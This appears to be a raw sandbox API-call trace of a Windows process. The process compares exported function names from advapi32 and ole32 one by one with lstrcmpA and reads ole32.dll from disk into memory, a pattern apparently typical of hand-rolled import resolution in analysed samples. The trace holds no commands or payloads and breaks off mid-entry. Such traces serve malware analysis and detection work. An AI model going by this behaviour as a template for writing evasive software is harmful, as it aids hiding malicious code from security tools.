lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0177.374] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0177.374] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0177.374] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0177.374] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0177.374] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0177.374] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0177.374] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0177.374] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0177.374] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0177.374] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0177.374] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0177.374] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0177.374] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0177.374] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0177.375] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0177.375] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0177.376] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0177.376] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0177.377] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0177.378] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0177.378] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0177.378] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0177.378] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0177.378] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0177.378] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0177.378] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0177.378] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0177.378] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0177.378] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0177.378] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0177.378] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0177.378] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0177.378] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0177.378] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0177.378] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0177.378] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0177.378] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0177.378] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0177.379] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0177.379] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0177.379] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0177.379] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0177.379] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0177.379] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0177.379] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0177.724] GetProcessHeap () returned 0x590000 [0177.724] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d02010 | out: hHeap=0x590000) returned 1 [0177.732] GetProcessHeap () returned 0x590000 [0177.732] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9100 [0177.733] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0177.734] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0177.734] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0177.734] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0177.734] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0177.734] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0177.734] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0177.734] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0177.735] GetProcessHeap () returned 0x590000 [0177.735] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x142d00) returned 0x40ce040 [0177.740] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0177.740] ReadFile (in: hFile=0x140, lpBuffer=0x40ce040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40ce040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0178.008] CloseHandle (hObject=0x140) returned 1 [0178.009] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0178.009] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0178.009] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0178.009] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0178.009] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0178.009] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0178.009] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0178.009] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0178.009] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0178.009] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0178.009] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0178.009] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0178.009] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0178.009] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0178.009] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0178.010] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0178.010] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0178.010] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0178.010] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0178.010] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0178.011] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0178.011] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0178.011] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0178.011] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0178.011] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0178.011] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0178.011] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0178.011] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0178.011] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0178.011] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0178.011] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0178.011] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0178.011] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0178.011] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0178.011] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0178.011] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0178.011] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0178.011] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0178.011] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0178.011] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0178.011] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0178.011] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0178.011] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0178.011] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0178.012] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0178.012] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0178.012] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0178.012] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0178.012] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0178.012] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0178.012] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0178.013] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", 